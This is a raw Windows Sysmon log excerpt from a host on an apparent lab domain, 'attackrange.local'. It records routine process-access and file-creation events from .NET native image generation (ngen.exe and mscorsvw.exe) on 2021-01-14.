13:24:35.177{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4613-6000-5F03-000000009A01}4340C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007525Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:35.161{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4613-6000-5F03-000000009A01}4340C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007524Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:35.161{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4613-6000-5F03-000000009A01}4340C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007523Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:24:35.099{08A6967A-4612-6000-5E03-000000009A01}5004C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\138c-0\System.Configuration.Install.dll2021-01-14 13:24:35.099 10341000x80000000000000007536Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:36.614{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4614-6000-6203-000000009A01}1228C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007535Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:36.599{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4614-6000-6203-000000009A01}1228C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007534Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:36.599{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4614-6000-6203-000000009A01}1228C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007533Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:36.396{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4614-6000-6103-000000009A01}5088C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007532Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:36.380{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4614-6000-6103-000000009A01}5088C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007531Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:36.380{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4614-6000-6103-000000009A01}5088C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007530Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:24:36.271{08A6967A-4613-6000-6003-000000009A01}3292C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\cdc-0\System.Xaml.dll2021-01-14 13:24:36.271 10341000x80000000000000007543Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:38.817{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4616-6000-6403-000000009A01}3832C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007542Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:38.802{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4616-6000-6403-000000009A01}3832C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007541Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:38.802{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4616-6000-6403-000000009A01}3832C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007540Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:38.724{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4616-6000-6303-000000009A01}3976C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007539Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:38.708{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4616-6000-6303-000000009A01}3976C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007538Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:38.708{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4616-6000-6303-000000009A01}3976C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007537Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:24:38.552{08A6967A-4614-6000-6203-000000009A01}1228C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\4cc-0\WindowsBase.dll2021-01-14 13:24:38.552 10341000x80000000000000007557Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:39.802{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4617-6000-6803-000000009A01}2972C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007556Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:39.786{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4617-6000-6803-000000009A01}2972C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007555Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:39.786{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4617-6000-6803-000000009A01}2972C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007554Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:39.568{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4617-6000-6703-000000009A01}3280C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007553Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:39.552{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4617-6000-6703-000000009A01}3280C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007552Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:39.552{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4617-6000-6703-000000009A01}3280C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007551Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:24:39.489{08A6967A-4617-6000-6603-000000009A01}4192C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1060-0\System.Xml.Linq.dll2021-01-14 13:24:39.489 10341000x80000000000000007550Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:39.271{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4617-6000-6603-000000009A01}4192C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007549Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:39.255{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4617-6000-6603-000000009A01}4192C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007548Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 